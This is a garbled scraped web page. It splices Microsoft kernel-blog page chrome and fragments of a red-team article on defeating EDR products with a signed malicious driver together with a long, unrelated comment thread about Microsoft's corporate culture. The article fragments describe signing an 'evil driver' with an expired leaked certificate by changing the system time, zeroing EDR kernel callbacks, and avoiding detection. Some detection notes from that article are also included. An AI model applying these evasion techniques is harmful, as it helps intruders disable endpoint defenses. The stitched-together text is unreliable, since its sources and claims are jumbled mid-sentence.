Turn on suggestions. Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type. Showing results for. Show only Search instead for. Did you mean:. Sign In. Back to Blog Newer Article. Welcome to Windows Kernel Team Blog. Hari Pulapaka. Published Sep 27 PM 6, Views. So that leaves finding an existing certificate.
After going down a long rabbit hole, I discovered a community that is familiar with exploiting and creating their own drivers. To my surprise, video game hackers have a very similar problem set to us and EDR, with regards to anti-cheat engines.
Anti-cheat engines for videogames work somewhat similar to EDRs in their function. To get around these anti-cheat engines, these hackers will also either load their own driver or exploit an existing driver to disable the functionality of the engines, much like us with EDR.
Before we continue, I would like to emphasize that I do not encourage using the following techniques for malicious purposes such as unauthorized hacking or cheating in online games.
This is simply a proof of concept on how they could be abused in an environment you have permission to test in. Looking at the certificate, it was even created before our July 29th, cutoff date!
As long as it was valid at one point. This may change in the future, but for now this is allowed. Microsoft allows for signing drivers with their SignTool and an appropriate cross-certificate. Using the certificate and cross-certificate together, we can sign our evil driver. As we can see, we hit a small issue.
It is saying we have no certificates that meet the criteria. Remember, the certificate expired in November of Turns out, we can pull some trickery with our system time. When we run our corresponding evilcli. To show the correlation between the application and driver, below is what happens when you run the application without starting the driver.
Generally speaking, antivirus and other security appliances generally do not as heavily scrutinize drivers. They are typically treated with significantly more trust than typical user applications. Because of this, virus signatures are probably not the most reliable way to detect malicious drivers. In addition, many EDRs do not have anti-tampering measures implemented to check if their callbacks are zeroed out or changed.
The reason for this is likely because as they are running in the kernel, they do not want to have the overhead of additional CPU cycles from continuously checking. What I did find, is that Windows event logs actually record when a driver is loaded within the System logs. This may not be a perfect detection, as there are edge cases. Below is an installation of the Npcap Packet Driver which comes with Wireshark installations.
Preface These techniques that will be discussed in this paper were not discovered by myself. This technique was made popular by Marcello Salvati, a red team In certain environments, controls such as firewalls are in place that restrict outbound ports and protocols. For example, maybe only web traffic over ports Many times, they Zach Stein Security Consultant. Acknowledgements My understanding of EDRs would not be possible without the help of many great security researchers.
Just avoid them If a host has EDR, move on to a host where the appliance is not installed Proxy traffic through the host, as to not execute commands on the system Stick to the gray area Blending in with typical network traffic. These actions may be slightly suspicious, but keep a low enough profile to need human eyes to analyze further Operate in the blind spots Sticking to those techniques which may not be logged.
What is an EDR? Below are some common EDR vendors you may know. Microsoft Documentation PatchGuard Back in the day the x86 Windows XP days and before , there was not a clear permission divide between the user land and the kernel land.
How Do Processes Interact with the Kernel? This way, the application is able to utilize the kernel functionality, without actually modifying or running in the kernel memory space Windows Drivers There are situations where an application needs to access protected data in the kernel. Typically, a tool that needs this functionality is split into two parts: User mode component application This component runs in user mode and presents the user interface.
Hari Pulapaka on Feb 21 PM. Windows Sandbox. Hari Pulapaka on Dec 18 PM. Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation. Learn mo Mitigating Spectre variant 2 with Retpoline on Windows. Read about how the Windows Kernel team adapted retpoline for Windows to deliver a high-performance mitigation for Spectr One Windows Kernel. Hari Pulapaka on Oct 17 PM. In this blog post, I will talk about the evolution of the core pieces of the Windows kernel that allows it to transparen Welcome to Windows Kernel Team Blog.
Hari Pulapaka on Sep 27 PM. Latest Comments. According to 0patch's FAQ, they don't patch the kernel for the specific reason you mention How to identify User mode or Kernel mode are being used? Do that mean if we enable shadow stack, user mode and kernel mode are both being used?
Vasyl wrote: 15 years of MS only technology experience has ended up for me 2 years ago when I read Android developers guide.
The ideas behind it seemed powerful as nothing else. JS Ecma5 standard astonished my imagination of the ideas and possibilities behind it. Seeing Microsoft out of these innovations I have it up. New ideas rule the world and me. Solely for this reason, slavery is Abolished from this planet. If you want people to be motivated, blame game and guilt therapy is pretty bad tool.
I guess you must be one of those who stayed back in MS because you could not make it to Google. How does THAT feel for sake of balance? When a company loses an experienced expert with irreplacable domain knowledge, replace them with a new college grad. The organization takes an enormous hit in every technical respect, but you save a lot of money. And since all of your competitors are already doing it, you will have aggressive business types winning all the arguments when it comes time for budgeting.
Society has already decided that every productivity increase brought about by technology and computers will benefit the business exclusively, with none of their benefits being shared with the employee. If productivity doubles, profit doubles, workload doubles, and compensation remains stagnant. Bill Pytlovany wrote: I worked in Blvd 42 in the early-mid 90's and I can't imagine having kids working on campus.
I hadn't heard that phrase before but I run into a lot of young programmers who were never taught some of the basics. My direct report was a fantastic mentor.
Besides our code, he also focused on our build environment. Everyone had the same version of Visual Studios and during a product cycle he wouldn't allow any updates or changes. He understood, as I have always taught, just changing the text of a string could affect your compiled code in ways you'd never imagine. I also occasionally participated in new employee interviews. The focus was always how someone thought more than what kind of education they had.
Thanks for reporting this comment and thanks to the gentleman who posted. It really is interesting to hear and picture how things work behind the scenes. JPH wrote: I have a feeling that the "follow up" is damage control and was not written by the author of the original post. JPH wrote: It's worth point out as well that the "follow up" is written in an entirely different style of verbatim. The vocabulary, structure, word frequencies, and the form and structure of the prose are all different.
I'm almost certain that the author is not the same person. Ken wrote: Guys: Keep in mind that there's a billion Chinese out there training to take our jobs at half the pay. You may talk about family balance and whatnot, but you better have your retirement plans lined up. Be valuable or be gone. The truth is, Microsoft is a has-been. Their years of monopoly have created enough inertia that they appear healthy but it's pretty much over.
As they say, "a big one like this can keep running around for years after you chop off the head. If the government had more control, there would be more technically competent people in key positions in the industry and we wouldn't have these problems and we would have more jobs for undocumented immigrants too. In this case, does that imply the original author had been identified within Microsoft and someone at MS had impersonated him to post the follow up through the same channel?
Look like one more developer is going to leave MS soon. Ken wrote: This post by mrb is nothing more than a rant by someone looking for their 15 minutes of fame. Windows 8 is a flop and they don't have a clue how to compete with Android. Notice I didn't mention Apple. You people don't seem to see what's happening. What would government control fix?
How are they going to provide more technical individuals? The hacker factory? The awesome education that public universities produce? The kids graduating public high school that can tell you who Pauly D is but not Stephen Hawking? The government is not the answer for anything, they aren't the smartest people in the room, they aren't even the smartest people in the neighborhood. Those people work at google according to this article.
When Iphone first release, it really showed computers could be packed in small devices and sold to lot more users. Computers were starting to become stagnant, and market needed something new to revitalize the computing industry. I don't say with such wide interest of disorganized developers, linux whole gnu has the best utility software, but they are just enough for these new companies to come up with a solution and start improving them constantly once they are up and running.
Moreover, google is creating their possible employees by funding and engazing with free software e. Microsoft is pretty much stagnant in that respect. Companies with big money do good, but companies with big money and great software do even better. Another problem for microsoft is, Linux is the most widely deployed software on the planet. It might currently not be as competitive on PCs, but just like, if I buy Sony TV and like it, it is most probable I will buy a sony music system, even if Philips has great product most consumers do.
Apart from PCs and mobiles, Linux is becoming pretty much a standard even on mobile it has a large presence. Even if Linux has problems on some parts, as the author suggested, big companies know what advatage they have going with free operating system. Today they are among top 10 contributers in the Linux kernel. Just for past 2 years, Linux utility software has gone a tremendeous improvements even on desktop and graphics side , and everyone knows how fast the kernel moves.
Microsoft has been bitten by its own actions. They pretty much slandered open source and never could embrace it. On the other hand apple uses so much free software and is doing pretty good. Microsoft plays by fear, and fear is not good for business. Things are changing, but if microsoft does not open up, and change their business model to a more open source model, if even google, facebook, amazon, Apple dies away there will be 20 more companies companies competing with Microsoft.
So the real question is, how long can they afford? Big Kate wrote: Can I just say thanks for reposting. I came here via slashdot, I hope the OP is OK and hasn't had any consequences for posting what they did. Personally it's a huge insight into why things don't happen as effectively as they might. What they describe is classic Big Corporation culture v.
The emphasis in big corporations on not messing up the product leads to that spreading to the entire tree. I can also understand why if you been hacking code inside the org for years and it feels like your not getting anywhere, that you will want to grumble and mention the stuff that is P-ing you off. I'm in other areas of development and I don't know anything about the technical issues they speak about I can accept microsoft has created great products, it eats own dog food as a matter of course and it's good to know that under it all MS8 is good and I hope that blue gets us a better UI option.
Having said that this thinkpad is running a debian variant, it has Win7 in a box that I occasionally load to do stuff that is utterly locked into windows enviroment.
Most of the devs I know have long abandoned MS and have either gone to Linux or in a corporate space — Mac because they have to have a machine bought with an OS and they get a choice of Apple or Microsoft.
I suspect when apple finally gives up on professional development environments and becomes a pure-play consumer product company they will switch to Linux as well So to both the OP and the person who blog I am reading can I say thanks. Thanks again 12 May UTC. Today you are able to do everything on the big distros without any knowledge of the operating system or anything.
Only the name of the applications differ. It is not even windows itself what most users keeps them locked to microsoft. The applications are. And those business decisions also affect the dev process. And that for many years. In a big company like MS reverting such bad influences can take really long. Big Kate wrote: one thing I forgot to say is that Microsfoft seem to have spent the last 10 years being run by people with no vision.
Their are technical leads in area who create great products - which I own such as the i have 4 of them. But it feels like microsoft managment fires them and then it just slides from there Personally I blame Steve Balmer - at least Bill Gates was willing to bet the farm to face out new opposition.
Oh and Btw I wont buying the durango - why? Because linux gaming is finally taking off with steam box etc. It took a long while for GL and CL to catch up but they have and it's where things are happening. Oh and i hate the windows 8 UI I am forced to use with the and it looks like microsoft has decided to copy apple again as far as a consumer unit and I hate the assumption of: lock in, lock down, yes please! Tex Pepper wrote: This piece reinforces what I've believed to be true of Microsoft for some time now: the company is like a huge, rudderless ship.
A ship which is now running aground - and the crew know it, too - some of them, at least - but nobody knows what to do about it or can't do anything, because she has grown so large for so long now that her momentum makes it impossible to change course. Perhaps the crew have tried to call the Bridge. I'm sure they have, but no-one is answering.
No one's there. The Bridge is empty. She has a Board of Directors, but no Navigator. A Management team, but no Helmsman. Momentum, but no Destination and, unless Microsoft does something very drastic to change her course very soon, she'll run aground.
It may already be too late. Microsoft really is very, very much like the Titanic, metaphorically speaking. That ship's designers also thought they had created something unsinkable; they also handed it off to a captain who drove her at top speed, blind, in the dark. Will Microsoft share Titanic's fate? The company has always struck me as being a bit out-of-touch with its customers but, now, like some gigantic whale swimming in the shallows, she in grave danger of being beached by the outgoing tide.
Even now she can't keep up. She is falling farther and farther behind whilst the smaller and more agile fish head out to sea. For my part I won't feel at all sorry to see Microsoft go away, but I will feel sorry for people like that bloke inside the company, trapped inside a system he would change if only he could.
I hope he and the others there like him get out in plenty of time. Let 'em drown. He was in a completely different state of mind when writing the follow-up ranting when writing the 1st time, anxious when writing the 2nd time. Personally I have some strong technical background with Windows from about years ago. While having touched Linux for the first time in the late 90s I'm now almost Linux-only. Every time I have to sit at a naked windows box I feel somehow lost. Linux comes along with all these nifty tools installed by default and almost everything that's not can be fetched from a repository in seconds.
Windows is a pain That's my view of using Windows as a development platform, granted I love the ease of using a command line tools. And I'm really happy that my company has Linux desktops for the developers. I can almost feel the pain of these vendors and its users, having spent years into knowledge about Windows,. NET and alike. Seeing this mess now, unsure if or how long. For me the period where WinFS and trusted computing were the hot topics around ? MS failed on some really expensive projects back then I think.
The introduction of SDLC in order to improve security was the right step but all these efforts are pretty hidden they don't improve user experience. Obviously this was the time when Apple stepped back in and brought up completely "new" UI experiences. Maybe this post is high-profile enough that it also reaches devs and managers in other SW companies, and gives some very important impulses.
I think what is described here for MSFT is reality in many other companies, and holds back innovation and improvement in a huge part of the industry. Somebody wrote: Speaking as an employee of another large software company that has read and occasionally even written rants similar to the original, the followup made me somewhat sad that it was necessary.
I realize we live in a world where people who don't know anything about how large software systems are maintained hang on every word written by the people behind the curtain, but almost everything he said in the followup seemed obvious to me. And so on. To the anonymous writer, whoever you are, I'd just like to say congratulations on a wonderful rant.
I'd definitely subscribe to your newsletter. What makes me wonder is what will happen to the endless number of Windows installations that we have to deal with as a part of our everyday lives. If the company does actually tank, what will happen to the kiosks, POS machines, schools, libraries, computer gaming?
I'd like to think that Linux would be graciously adopted - and Valve seem pretty eager to make that happen - but I'm cautious. David wrote: I have issues with big companies in general, but very specific ones with MS in particular. I've been working as a hardware engineer for many years and can't describe the pain I had supporting Windows with regards of their completely broken and absolutely brain-dead USB stack and audio implementation.
IOW: we were forced to ship uncompliant devices for users of all platforms because some people in Seattle had no clue what they were doing, over years and years, across many incarnations of the broken heap they're selling. On a different note, I used to build large-scale mail systems some years ago, and the exact same kind of hell broke loose in that area too.
We constantly had to fix up after the one of the biggest software companies in the world which broke every single bit they even remotely touched, and then actively tried to prevent me from understand what the fuck is going on by not letting me have a look at their buggy implementation.
That's actually my biggest complaint here: It's ok to make mistakes. They just happen. What matters is their stinking ignorance, their fear of re-doing things for the sake of improvement, their resistance to learn, and their idea of intellectual property which does not allow you to understand the actual problem. Long story short: I'm done with them. I don't care why they don't scale, and how they compare themselfes to others. I want them to vanish completely, the sooner the better.
And I want companies to not bother anymore. Stop shipping Windows drivers for your hardware, it's worthless. Stop selling software for their platform. It's a pain in the ass to the the OS running anyway. Hopefully, Wine windows application support in Linux will improve so legacy windows apps can run until they are replaced. I've seen the NTFS code, and it's scary. It's too fragile. The original NT team had more than it's fair share of of genius-level engineers, from Cutler on down.
They could get away with creating the ugliness that is NTFS. I have far less faith in the subsequent maintainers. Dell, HP, Lenovo, etc. Large corporations with volume license and enterprise agreements are also MS's customers. MS doesn't always do what they want, but there is an active dialog between MS and their direct customers. John Doe wrote: One more thought I know this completely pisses off the old school purists a group I'm often accused of belonging to , but the fact is that performance only matters when it falls below some acceptable level.
Once you reach "acceptability", it becomes harder to justify putting effort into small incremental improvements. No company has infinite resources, even MS. The explosion of battery powered devices phones and tablets has changed the calculus, but only so much. One of the stated technical reasons and the only only I find even remotely plausible for needing the new WinRT API is improved battery life vs.
Windows 8 shows that trying to optimize for performance can alienate your existing customers who don't perceive performance as a problem. I worked in several big companies like HP, ATT and i see that they are moving very slowly in their technology development and infrastructure quality, performance. To summ up from long term point of view i see the future in little commercial or not commercial companies Anonymous wrote: Steve Ballmer is here.
Nietzsche wrote: There are some people who treat their coding time as a job, they can be used to do the boring tasks like updating documentation. To get this, I had to take my laptop to a Samsung repair centre where an engineer kept it for 7 days and examined it to make sure that I don't use Windows 8 on the laptop. No matter what the amount, I'm not going to pay for a product I don't want or use.
Had Samsung not agreed to refund me, I would have returned the unit for a refund even though OS free or pre-installed Linux laptops here in the UK are slim pickin's. Using the latest nVidia binary For some reason, nVidia are unable to vsync on both monitors in a dual-monitor configuration. While it "works", the quality and user experience are rubbish.
A simple thing, like dragging a window around, become jerky and stuttery. This problem is much worse if you're dragging a window that's hugging the top of the desktop. This does not occur with the Intel HD This is one perfect example of why "open" trumps "closed". The nVidia drivers are proprietary closed while the Intel HD drivers are open.
The difference between running a Linux well, the Unity desktop on both is like night and day. Everything works beautifully and smoothly on the HD and it's much more responsive , even though it can't push as many pixels as the TI. The future is in open, not closed.
Steve wrote: Liked the article. Unfortunately, again, in my own personal experience , most people doing just the basic minimum 9-to-5 are these kind of people.
Everyone seems to assume the author is male and the majority of posters seem really stressed. Go for a surf Steve wrote: I noticed windows performance decrease when Microsoft introduced "superfetch".. AKA disk-to-memory caching that thrashed the hard disk to put programs in memory which the user might required. All because "we wanted to use up all available RAM" akin to wanting to use up all hard disk space.
0コメント